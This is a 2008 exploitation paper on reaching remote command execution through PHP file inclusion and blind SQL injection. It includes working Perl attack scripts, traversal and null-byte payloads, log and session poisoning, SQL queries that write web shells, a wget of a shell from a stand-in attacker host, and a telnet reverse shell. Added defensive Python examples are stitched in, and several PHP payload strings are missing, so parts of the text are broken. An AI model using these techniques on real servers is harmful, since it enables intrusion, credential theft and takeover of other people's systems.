|=--------=[ Web vulnerabilities to gain access to the system ]=---------=|
|=-----------------------------------------------------------------------=|
|=----=[ pepelux[at]enye-sec[dot]org - ]=------=|
|=-----------------------------------------------------------------------=|
|=----=[ spanish translation available in http://www.enye-sec.org ]=-----=|
|=-----------------------------------------------------------------------=|
|=---------------------------=[ Oct 12th 2008 ]-=------------------------=|

Translated by bOBaNa (http://www.wowhacker.com) 2008.10.25
(sorry for the rough translation....)

--[ Content

1 - Introduction
2 - Local and Remote File Inclusion (LFI/RFI)
  2.1 - Introduction
  2.2 - Executing commands remotely
    2.2.1 - Injecting PHP code into apache logs
    2.2.2 - Injecting PHP code into process table
    2.2.3 - Injecting PHP code into an image
    2.2.4 - Injecting PHP code into session files
    2.2.5 - Injecting PHP code into other files
  2.3 - Obtaining a shell
  2.4 - Remote File Inclusion
3 - Blind SQL Injection
  3.1 - Introduction
  3.2 - Loading local files
  3.3 - Obtaining data without brute force
  3.4 - Executing commands remotely
  3.5 - Obtaining a shell
4 - References

---[ 1 - Introduction

There are many vulnerabilities that allow a website to be exploited, and all of them are old and well documented. We can find attacks such as LFI, RFI, SQL, XSS, SSI, ICH, etc. For this reason, this document focuses on the attacks that give access to the system and let us execute commands remotely. Since it is tedious to write yet another document covering every kind of vulnerability (the same attacks you already know), I will try to contribute new things while recalling the basic concepts.

---[ 2 - Local and Remote File Inclusion (LFI/RFI)

----[ 2.1 - Introduction

This type of attack is well known. Basically, it exploits badly programmed PHP pages that call other files through require, require_once, include or include_once, in order to read system files.
Logically, these calls have to be made with a variable that has not been initialized. Example:

    require($file);
    require("includes/".$file);
    require("languages/".$lang.".php");
    require("themes/".$tema."/config.php");

The methods to attack this are well known, so I will not detail them, only list them. For example:

Type of call: require($file);
Exploit:      http://host/?file=/etc/passwd

Type of call: require("includes/".$file);
Exploit:      http://host/?file=../../../../../etc/passwd

Type of calls: require("languages/".$lang.".php");
               require("themes/".$theme."/config.php");
Exploit:       http://host/?file=../../../../../etc/passwd%00

Type of call: require("languages/".$_COOKIE['lang'].".php");
Exploit:      javascript:document.cookie = "lan=../../../../../etc/passwd%00";

A script to exploit this kind of vulnerability (by GET or POST) is:

lfi.pl
---------------------------------------------
#! /usr/bin/perl
# perl script to exploit LFI based in GET and POST requests
# Example: http://site.com/index.php?var=
#   URL: http://site.com/index.php
#   Variable: var
#   Method: POST
#
# by Pepelux (pepelux[at]enye-sec[dot]org)

use LWP::UserAgent;

$ua = LWP::UserAgent->new;
my ($host, $var, $method) = @ARGV ;

unless($ARGV[2]) {
    print "Usage: perl $0 \n";
    print "\tex: perl $0 http://site.com/index.php var GET\n";
    print "\tex: perl $0 http://site.com/index.php var POST\n\n";
    exit 1;
}

$ua->agent("Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1)");
$ua->timeout(10);
$host = "http://".$host if ($host !~ /^http:/);

# keep asking for files and request each one through the vulnerable include
while (1) {
    print "file to edit: ";
    chomp($file=<STDIN>);

    if ($method =~ /GET/) {
        $url = $host."?".$var."=../../../../..".$file."%00";
        $req = HTTP::Request->new(GET => $url);
        $req->header('Accept' => 'text/html');
    }
    else {
        $req = HTTP::Request->new(POST => $host);
        $req->content_type('application/x-www-form-urlencoded');
        $req->content($var."=../../../../".$file."%00");
    }

    $res = $ua->request($req);

    if ($res->is_success) {
        $result = $res->content;
        print $result;
    }
    else { print "Error\n"; }
}
---------------------------------------------

----[ 2.2 - Executing commands remotely

The kind of vulnerability we have just seen lets us view any system file that the web user has read access to, but it also lets us execute system commands. To do this it is necessary to write the following PHP code into some file:

cmd is the name of our variable, used to pass data by GET. Now we only have to find some place where we can write data. How? We have several methods:

-----[ 2.2.1 - Injecting PHP code into apache logs

We know that the Apache server stores all of its operation logs in access_log and error_log. We can play with the logged data and make it insert PHP code. For example, to insert into error_log it is enough to call a page that does not exist, sending the code that we want written:

    http://host/xxxxxxx=

This inserts a line containing the code we wrote into error_log. And now? We only have to load this file in the same way as before and send the command we want to execute through the cmd variable:

    http://host/?file=../../../var/apache/error_log&cmd=ls /etc
    http://host/?file=../../../var/apache/error_log&cmd=uname -a

But how do we know the location of the Apache logs? It depends on the operating system and on the sysadmin. One option is to look in the typical directories where logs are stored:

    /var/log/apache/
    /var/log/httpd/
    /usr/local/apache/logs/
    ......

On a shared server we may find the following situation:

    /path/host.com/www
                  /logs
                  /data

In this case, to learn the path we only have to request a file that does not exist, for example:

    http://host/?file=xxxx

On screen we will see something like:

    Warning: require(xxxx) [function.require]: failed to open stream: No such file or directory in /var/www/host.com/www/p.php on line 2

We can deduce that the log files are in /var/www/host.com/logs.
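As an added example (not part of the original paper or its scripts), the following Python models the require("languages/".$lang.".php") pattern from 2.1 next to a hardened resolver, and shows where the traversal and %00 payloads above end up under each. The web root and the language allowlist are assumed values; the resolver also refuses http:// values, which goes slightly beyond this section.

```python
import os
import re
from urllib.parse import unquote

# Constructed web root for the demo; the layout is assumed, not taken from the paper.
WEB_ROOT = "/var/www/host.com/www"
# The only language files that exist. Mapping input through an allowlist is the
# real fix; the checks after it are defence in depth.
ALLOWED_LANGS = {"en", "es", "ko"}


def naive_include(base, user_value):
    """Model of require("languages/".$lang.".php") with the request value pasted in.

    Also models the NUL-byte truncation of old PHP builds (before 5.3.4), which is
    what the trailing %00 in the paper's payloads relies on to drop the ".php".
    """
    raw = unquote(user_value)  # in reality the web server has already decoded this
    path = os.path.join(base, "languages", raw + ".php")
    if "\x00" in path:
        path = path.split("\x00", 1)[0]
    return os.path.normpath(path)


def safe_include(base, user_value):
    """Resolve the same include without letting the input shape the path.

    Returns the absolute file path, or None when the value is rejected.
    """
    raw = unquote(user_value)
    # 1. Only a short bare identifier is acceptable. This alone refuses "../",
    #    "%00", absolute paths and remote URLs before any path logic runs.
    if not re.fullmatch(r"[A-Za-z0-9_-]{1,32}", raw):
        return None
    # 2. Allowlist: the name must be one that is shipped with the application.
    if raw not in ALLOWED_LANGS:
        return None
    # 3. Containment check on the canonical path, in case the allowlist is ever
    #    replaced by something computed at runtime.
    lang_dir = os.path.realpath(os.path.join(base, "languages"))
    candidate = os.path.realpath(os.path.join(lang_dir, raw + ".php"))
    if not candidate.startswith(lang_dir + os.sep):
        return None
    return candidate


def compare(base, user_value):
    """Return (where the naive include lands, what the hardened one returns)."""
    return naive_include(base, user_value), safe_include(base, user_value)
```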
Another way to find the log path is to look at the httpd.conf configuration file, where we can see something like:

    ErrorLog /var/log/apache/error.log

or, on a shared server:

    ErrorLog /home/chs/host.com/home/logs/error_log

But, as written before, 'it depends on the operating system, the Apache version and the sysadmin', so it is possible that it is not in this location.

We can also find the path of the Apache logs by searching the process table: /proc/{PID}/fd/{FD_ID} (the problem is that on some systems the fd directory is only accessible by the owning user). To find the PID of the Apache process that handles our HTTP request we read the content of /proc/self/stat. Since self is a link to the last PID used on the system, we can read the file by pointing to /proc/self. Inside /proc/{PID}/fd there are only a few links to analyze in order to find the access_log and error_log paths. To do this we will use a perl script that goes through all the links inside /proc/self/fd/ looking for the error_log path.

proc.pl
---------------------------------------------
#! /usr/bin/perl
# perl script to find the path of the apache logs
# Example:
#   URL: http://site/index.php
#   Variable: file
#   Method: POST
#
# by Pepelux (pepelux[at]enye-sec[dot]org)

use LWP::UserAgent;

$ua = LWP::UserAgent->new;
my ($host, $var, $method) = @ARGV ;

unless($ARGV[2]) {
    print "Usage: perl $0 \n";
    print "\tex: perl $0 http://site.com/index.php file GET\n";
    print "\tex: perl $0 http://site.com/index.php file POST\n\n";
    exit 1;
}

$ua->agent("");
$ua->timeout(10);
$host = "http://".$host if ($host !~ /^http:/);

# step 1: read /proc/self/stat through the include to learn the apache PID
if ($method =~ /GET/) {
    $url = $host."?".$var."=../../../../proc/self/stat%00";
    $req = HTTP::Request->new(GET => $url);
    $req->header('Accept' => 'text/html');
}
else {
    $req = HTTP::Request->new(POST => $host);
    $req->content_type('application/x-www-form-urlencoded');
    $req->content($var."=../../../../proc/self/stat%00");
}

$res = $ua->request($req);

if ($res->is_success) {
    $result = $res->content;
    $result =~ s/<[^>]*>//g;      # strip the HTML around the included content
    $x = index($result, " ", 0);
    $pid = substr($result, 0, $x);
    print "Apache PID: ".$pid."\n";
}

# step 2: read /proc/self/status to learn FDSize (how many fd entries to walk)
if ($method =~ /GET/) {
    $url = $host."?".$var."=../../../../proc/self/status%00";
    $req = HTTP::Request->new(GET => $url);
    $req->header('Accept' => 'text/html');
}
else {
    $req = HTTP::Request->new(POST => $host);
    $req->content_type('application/x-www-form-urlencoded');
    $req->content($var."=../../../../proc/self/status%00");
}

$res = $ua->request($req);

if ($res->is_success) {
    $result = $res->content;
    $result =~ s/<[^>]*>//g;
    $x = index($result, "FDSize",0)+8;
    $fdsize = substr($result, $x, 3);
    print "FD_SIZE: ".$fdsize."\n";
}

# step 3: open each fd link and look for the line injected into error_log
for ($cont = 0; $cont < $fdsize; $cont++) {
    $file = "../../../../proc/".$pid."/fd/".$cont;
    open FILE, $file;
    while(<FILE>) {
        if (($_ =~ /does not exist/) && ($_ =~ /passthru/)) {
            print "FD: ".$cont."\n";
            exit;
        }
    }
}
---------------------------------------------

pepelux:~$ perl proc.pl http://host/index.php page GET
Apache PID: 4191
FD_SIZE: 64
FD: 2

If the script finds the injected line in an FD that the user is allowed to read, then in this case we have a link to error_log at /proc/4191/fd/2.
Modify the first script to add the call (see the first script):

    http://host/?file=/proc/4191/fd/2&cmd=uname -a

We can also make the injection using a URL that does not return an error, in which case the log entry is saved in access_log:

    http://host/index.php?x=

It is possible that Apache does not store the injection correctly, or that it converts the tags into their hex values. In that case we cannot do anything by sending the PHP code via GET or POST. But more data is stored in access_log, in the referer and the user-agent, and we can inject there too. We are going to run some tests with this perl script:

cmd.pl
---------------------------------------------
#! /usr/bin/perl
# perl script to inject the CMD through a web LFI vulnerability
# Example:
#   Host: http://host.com
#   type: U
#
# by Pepelux (pepelux[at]enye-sec[dot]org)

use LWP::UserAgent;

$ua = LWP::UserAgent->new;
my ($host, $type) = @ARGV ;
$code="";

unless($ARGV[1]) {
    print "Usage: perl $0 [URI|UAG|REF]\n";
    print "\tURI: URI\n";
    print "\tUAG: User-Agent\n";
    print "\tREF: Referer\n\n";
    print "\tex: perl $0 http://host.com URI\n";
    exit 1;
}

$host = "http://".$host if ($host !~ /^http:/);

# put the code in the User-Agent, the URI or the Referer depending on type
if ($type =~ /UAG/) { $ua->agent($code); }
else { $ua->agent("Mozilla/5.0"); }

if ($type =~ /URI/) { $host .= "/" . $code; }

$req = HTTP::Request->new(POST => $host);
$req->content_type('application/x-www-form-urlencoded');
$req->content("x=x");

if ($type =~ /REF/) { $req->referer($code); }

$res = $ua->request($req);
---------------------------------------------

Writing to error_log by sending a URI that does not exist:

    pepelux:~$ perl cmd.pl http://host.com/blabla URI

In error_log we can see:

    [Wed Oct 08 12:50:00 2008] [error] [client 11.22.33.44] File does not exist: /home/chs/host.com/home/html/blabla

Trying with the User-Agent:

    pepelux:~$ perl cmd.pl http://host.com/blabla UAG

In error_log we see the same:

    [Wed Oct 08 12:50:00 2008] [error] [client 11.22.33.44] File does not exist: /home/chs/host.com/home/html/blabla

Trying with the Referer:

    pepelux:~$ perl cmd.pl http://host.com/blabla REF

In this case we get the injection:

    [Wed Oct 08 12:52:54 2008] [error] [client 11.22.33.44] File does not exist: /home/chs/host.com/home/html/blabla, referer:

Now we are going to write to access_log instead of error_log:

    pepelux:~$ perl cmd.pl http://host.com/index.php URI

This time we get:

    11.22.33.44 - - [08/Oct/2008:12:57:39 +0200] "POST /index.php/%3C?%20passthru($_GET[cmd])%20?%3E HTTP/1.1" 301 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008072820 Firefox/3.0.1"

Trying with the User-Agent:

    pepelux:~$ perl cmd.pl http://host.com/index.php UAG

We get the injection:

    11.22.33.44 - - [08/Oct/2008:13:00:05 +0200] "POST /index.php HTTP/1.1" 301 - "-" ""

Trying with the Referer:

    pepelux:~$ perl cmd.pl http://host.com/index.php REF

We get the injection:

    11.22.33.44 - - [08/Oct/2008:13:00:56 +0200] "POST /index.php HTTP/1.1" 301 - "" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1)Gecko/2008072820 Firefox/3.0.1"

-----[ 2.2.2 - Injecting PHP code into process table

I found a document that explains how to inject into /proc/self/environ, a fixed path that I already knew (see the references below). The problem is that this file is only accessible by root, so we cannot read it. As written before, /proc/self is a link to the last PID used, and since we can reach it directly through the self link we do not need to find the PID of the Apache process. The attack consists of injecting into the User-Agent sent right after a call to this file:

    http://host/?file=../../../proc/self/environ&cmd=uname -a

Since the injection has to happen immediately, before the self link moves to another process PID, and the command has to be sent immediately as well, this has to be done with a small script.

-----[ 2.2.3 - Injecting PHP code into an image

Injecting PHP code into an image is typical of websites that allow uploading images that are stored on the server (for example, avatars). So what happens if we upload a file whose content is the PHP code, with an image extension? Since the extension is valid it is uploaded without problems, and we can carry out the LFI attack in the same way:

    http://host/?file=path/avatar.gif&cmd=uname -a

-----[ 2.2.4 - Injecting PHP code into session files

Suppose the following vulnerable code:

As we can see, the code creates a session variable whose value is taken from GET without any validation. We can send:

    http://host/?user=

and then look at the cookies in our browser, where we see something like:

    PHPSESSID=b25ca6fea480073cf8eb840b203d343e

Looking at the content of the session folder on our own system:

    pepelux:~$ more /tmp/sess_b25ca6fea480073cf8eb840b203d343e
    user|s:26:"";

As we can see, we can inject code into the stored session, and then execute commands through that file:

    http://host/?file=/tmp/sess_b25ca6fea480073cf8eb840b203d343e&cmd=uname -a

In this case the location of the file is known and we can choose the file without any problem. If GET is filtered, we can send it by POST instead.
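Every variant in 2.2.1 to 2.2.4 leaves the PHP open tag in a logged field (request line, User-Agent, Referer or error_log message) or an include path with ../ and %00 in the request line. The following Python detector is an added example, not code from the paper: it parses Apache combined-format and error_log lines and flags those indicators. The sample lines are constructed to mirror the paper's output.

```python
import re
from urllib.parse import unquote

# Combined log format, as in the access_log lines shown in the paper.
ACCESS_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)
ERROR_RE = re.compile(r'^\[(?P<ts>[^\]]+)\] \[error\] \[client (?P<ip>[^\]]+)\] (?P<msg>.*)$')

# Indicators of the injections in 2.2.1 to 2.2.4: a PHP open tag, the execution
# primitives such a payload calls, and traversal / NUL-byte / procfs include paths.
PHP_TAG = re.compile(r"<\?(php|=|\s)", re.IGNORECASE)
PHP_EXEC = re.compile(r"\b(passthru|system|shell_exec|exec|eval)\s*\(", re.IGNORECASE)
TRAVERSAL = re.compile(r"(\.\./){2,}|/proc/self/|\x00")


def _decode(value):
    # Decode twice: Apache stores '<' as %3C (the paper shows this) and a client
    # may have encoded the payload once more.
    return unquote(unquote(value))


def scan_line(line):
    """Return a list of (field, indicator) findings for one log line, [] if clean."""
    findings = []
    m = ACCESS_RE.match(line)
    if m:
        fields = {"request": m.group("req"), "referer": m.group("referer"), "agent": m.group("agent")}
    else:
        m = ERROR_RE.match(line)
        if not m:
            return findings  # unparsed line; a real pipeline would count these
        fields = {"message": m.group("msg")}
    for name, value in fields.items():
        text = _decode(value)
        if PHP_TAG.search(text) or PHP_EXEC.search(text):
            findings.append((name, "php-code"))
        if name in ("request", "message") and TRAVERSAL.search(text):
            findings.append((name, "traversal"))
    return findings


def scan_log(lines):
    """(line index, finding) for every hit across a log."""
    return [(i, f) for i, line in enumerate(lines) for f in scan_line(line)]


# Constructed sample lines modelled on the paper's output (not real traffic).
SAMPLE = [
    '11.22.33.44 - - [08/Oct/2008:12:57:39 +0200] "POST /index.php/%3C?%20passthru($_GET[cmd])%20?%3E HTTP/1.1" 301 - "-" "Mozilla/5.0"',
    '11.22.33.44 - - [08/Oct/2008:13:00:05 +0200] "POST /index.php HTTP/1.1" 301 - "-" "<? passthru($_GET[cmd]) ?>"',
    '11.22.33.44 - - [08/Oct/2008:13:05:12 +0200] "GET /?file=../../../var/log/apache/error_log%00&cmd=uname HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '[Wed Oct 08 12:52:54 2008] [error] [client 11.22.33.44] File does not exist: /home/chs/host.com/home/html/blabla, referer: <? passthru($_GET[cmd]) ?>',
    '11.22.33.44 - - [08/Oct/2008:13:10:00 +0200] "GET /index.php HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
]
```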
-----[ 2.2.5 - Injecting PHP code into other files

Generally we cannot access other logs because only root can read them, but it is still possible to inject our code into them, for example into the FTP logs:

    pepelux:~$ ftp host.com
    220 ProFTPD 1.3.1 Server (Debian) [host.com]
    Name (pepelux):
    Password:

If we look at /var/log/proftpd/proftpd.log, we can see the injected code:

    Oct 09 21:50:21 host.com proftpd[11190] host.com ([11.22.33.44]): USER : no such user found from [11.22.33.44] to host.com:21

If the vulnerable server uses an old version of webalizer and it is reachable over the web, the usage_DATE.html file is generated with the visit statistics; using a bug affecting old webalizer versions that allows HTML code from the access_log referer to be written into it, we can use that file to execute our code. For example:

    Referer:

You only have to make enough calls with this referer for it to enter the most-sent list, and it appears in the usage_DATE.html file.

If the Apache server allows the PUT command, we can upload a file with our code:

    pepelux:~$ telnet host.com 80
    Trying 11.22.33.44...
    Connected to host.com.
    Escape character is '^]'.
    OPTIONS / HTTP/1.1

    HTTP/1.1 200 OK
    Date: Sat, 11 Oct 2008 15:06:05 GMT
    Server: Apache/2.2.9 (Debian) PHP/5.2.6-5
    Allow: GET,HEAD,POST,PUT,OPTIONS,TRACE
    Content-Length: 0
    Connection: close
    Content-Type: httpd/unix-directory

    Connection closed by foreign host.

To inject:

    pepelux:~$ telnet host.com 80
    Trying 11.22.33.44...
    Connected to host.com.
    Escape character is '^]'.
    PUT /file.txt HTTP/1.1
    Content-Type: text/plain
    Content-Length:26

----[ 2.3 - Obtaining a shell

If we can execute commands remotely, we can try to upload a shell in order to get more access to the system. One way is to create a PHP based shell. We can download it with the wget command:

    http://host/?file=xxxx&cmd=wget http://devil/shell.txt -O shell.php

If we cannot download a PHP file over HTTP, we can download it as a TXT file and save it as PHP.

We can also try a reverse telnet:

    pepelux:~$ nc -vv -l -p 8888
    pepelux:~$ nc -vv -l -p 8889

    http://host/?file=xxxx&cmd=telnet devil 8888 | /bin/sh | telnet devil 8889

----[ 2.4 - Remote File Inclusion

If allow_url_include is enabled in php.ini, we can inject a shell directly. The method is the same as described before and is well known. You only have to load the shell in the URI, by GET or POST (using a non-PHP extension):

    http://host/?file=http://devil.com/shell.txt
    http://host/?file=http://devil.com/shell.txt%00

---[ 3 - Blind SQL Injection

----[ 3.1 - Introduction

SQL injection attacks are well known and well documented. I do not want to write the same kind of thing again; I am only going to write about techniques that let us read system files.

----[ 3.2 - Loading local files

With a SQL injection web vulnerability, if the database user has permission to use load_file, we can read any system file such as /etc/passwd. Example:

Table: users(id int, user char(25), pass char(25), mail char(255));

Data:
+---+---------+----------------------------------+--------------+
| 1 | admin   | 23e4ad2360f4ef4268cb44871375a5cd | admin@host   |
+---+---------+----------------------------------+--------------+
| 2 | pepelux | 655ed32360580ac468cb448722a1cd4f | pepelux@host |
+---+---------+----------------------------------+--------------+

Vulnerable code:

We have a MySQL database with an unknown table and unknown fields, and the page shows no error on screen.

> Correct call to see the mail of user 2:

    http://host/?id=2

> Trying to reorder the query result using SQL injection:

    http://host/?id=2 ORDER BY 1 ... Ok
    http://host/?id=2 ORDER BY 2 ... Ok
    http://host/?id=2 ORDER BY 3 ... Ok
    http://host/?id=2 ORDER BY 4 ... Ok
    http://host/?id=2 ORDER BY 5 ... Error

Why does ORDER BY 5 produce an error? If a normal user sends ORDER BY 2 to MySQL to order the result, we can order it by the pass column, but since this table only has 4 columns, ORDER BY 5 produces an error. Why is that useful? We learn the number of columns the table has.
> Modifying the answer we see on screen (we know there are 4 columns):

    http://host/?id=-1 UNION SELECT 1,2,3,4

What does this do? We search for the user with ID=-1, which returns 0 results, and we create a new row with the injected data. Why do we have to use ID=-1? Let's look at a practical example. We send:

    http://host/?id=2 UNION SELECT 1,2,3,4

We obtain:

+---+---------+----------------------------------+--------------+
| 2 | pepelux | 655ed32360580ac468cb448722a1cd4f | pepelux@host |
+---+---------+----------------------------------+--------------+
| 1 | 2       | 3                                | 4            |
+---+---------+----------------------------------+--------------+

Since only the first row is selected, on screen we see:

    User mail is: pepelux@host

With ID=-1 we obtain the injected data instead. We send:

    http://host/?id=-1 UNION SELECT 1,2,3,4

We obtain:

+---+---------+----------------------------------+--------------+
| 1 | 2       | 3                                | 4            |
+---+---------+----------------------------------+--------------+

and on screen we see:

    User mail is: 4

> We use the 4th column to inject (the 4th column is the one displayed on screen):

    http://host/?id=-1 UNION SELECT 1,2,3,load_file('/etc/passwd');

This prints the content of /etc/passwd in the place of the user's mail (this is only possible when the mysql user has permission to execute load_file). If magic_quotes is On we can use the hex value:

    http://host/?id=-1 UNION SELECT 1,2,3,load_file(0x2f6574632f706173737764);

The difference between reading files with LFI and reading them with SQL injection is the user that reads the files: in the first case it is the Apache user, in the second the MySQL user. This is not very useful in itself, but it can be useful for reading the same file with different permissions.
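To make the reasoning in 3.2 concrete, the following Python is an added example (not the paper's code) that rebuilds the users table in SQLite and runs the ORDER BY and UNION probes above against an assumed vulnerable query, next to the parameterized version that refuses them. SQLite has no load_file, so only the column-counting and UNION steps are reproduced.

```python
import sqlite3

# Constructed in-memory copy of the paper's users table (the two rows of 3.2).
ROWS = [
    (1, "admin", "23e4ad2360f4ef4268cb44871375a5cd", "admin@host"),
    (2, "pepelux", "655ed32360580ac468cb448722a1cd4f", "pepelux@host"),
]


def _db():
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users(id INTEGER, user TEXT, pass TEXT, mail TEXT)")
    con.executemany("INSERT INTO users VALUES (?,?,?,?)", ROWS)
    return con


def mail_vulnerable(id_param):
    """Assumed equivalent of the paper's vulnerable page (its PHP is not reproduced
    in the paper as extracted): the id parameter is pasted into the SQL text and
    only the 4th column of the first row is displayed."""
    con = _db()
    try:
        row = con.execute("SELECT * FROM users WHERE id=" + id_param).fetchone()
    except sqlite3.OperationalError as e:
        # This is the blind signal the paper uses: error versus no error.
        return "Error: " + str(e)
    # Note: with "2 UNION SELECT ..." the engine decides which row comes first,
    # which is exactly why the paper uses ID=-1 to leave only the injected row.
    return "User mail is: %s" % (row[3] if row else "")


def mail_parameterized(id_param):
    """Fixed version: reject non-integers at the boundary and bind the value so it
    can never be parsed as SQL."""
    if not id_param.isdigit():
        return "Error: id must be a positive integer"
    con = _db()
    row = con.execute("SELECT mail FROM users WHERE id=?", (int(id_param),)).fetchone()
    return "User mail is: %s" % (row[0] if row else "")
```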
----[ 3.3 - Obtaining data without brute force

Suppose the same situation, with the same vulnerable code as before:

Table: users(id int, user char(25), pass char(25), mail char(255));

Data:
+---+---------+----------------------------------+--------------+
| 1 | admin   | 23e4ad2360f4ef4268cb44871375a5cd | admin@host   |
+---+---------+----------------------------------+--------------+
| 2 | pepelux | 655ed32360580ac468cb448722a1cd4f | pepelux@host |
+---+---------+----------------------------------+--------------+

We can see all the data in this table by doing:

    http://host/?id=1 outfile "/tmp/sql.txt"
    http://host/?id=-1 UNION SELECT 1,2,3,load_file('/tmp/sql.txt');

The content of /tmp/sql.txt is:

    1 admin 23e4ad2360f4ef4268cb44871375a5cd admin@host

As we can see, we extracted all the data of the user with ID=1 without needing to know the table name or the field names. In the same way we can extract the fields of every user. The problem with this attack is that we can only read data from the table used in the query.

Using this technique we can copy system files into local directories in order to access them over the web. For example:

    http://host/?id=-1 union select 1,load_file("/etc/passwd"),1 into outfile "/var/www/host.com/www/passwd"

And we can create PHP files. For example:

    http://host/?id=-1 union select 1,"",1 into outfile "/var/www/host.com/www/phpinfo.php"

----[ 3.4 - Executing commands remotely

So far we have seen several methods to inject the code that gives us the possibility of executing commands remotely. The main problem we found is finding a file in which to write the PHP code. Apache logs are complicated to locate, and it is possible that a normal user has no permission to read them. In that case it is easy to provoke an error in order to see the path of the website on screen. If we know it, we can create a PHP file that lets us execute commands:

    http://host/?id=-1 union select 1,"",1 into outfile "/var/www/host.com/www/cmd.php"

Then we only have to do:

    http://host/cmd.php?cmd=uname -a

If the website is vulnerable to LFI attacks we can write the PHP code in any place where we have write permission.
For example in /tmp. First, we insert the code into a file in /tmp:

    http://host/?id=-1 union select 1,"",1,1 into outfile "/tmp/sql.txt"

Then we use LFI to execute commands:

    http://host/?file=../../../tmp/sql.txt&cmd=uname -a

----[ 3.5 - Obtaining a shell

Once we have created a file containing our PHP code, the method to obtain a shell is the same as explained for LFI (see section 2.3) :-)

---[ 4 - References

- http://www.g-brain.net/tutorials/local-file-inclusions.txt
- http://ush.it/team/ascii/hack-lfi2rce_proc/lfi2rce.txt
- http://www.securityfocus.com/bid/3473
- http://dev.mysql.com/doc/

# milw0rm.com [2008-10-12]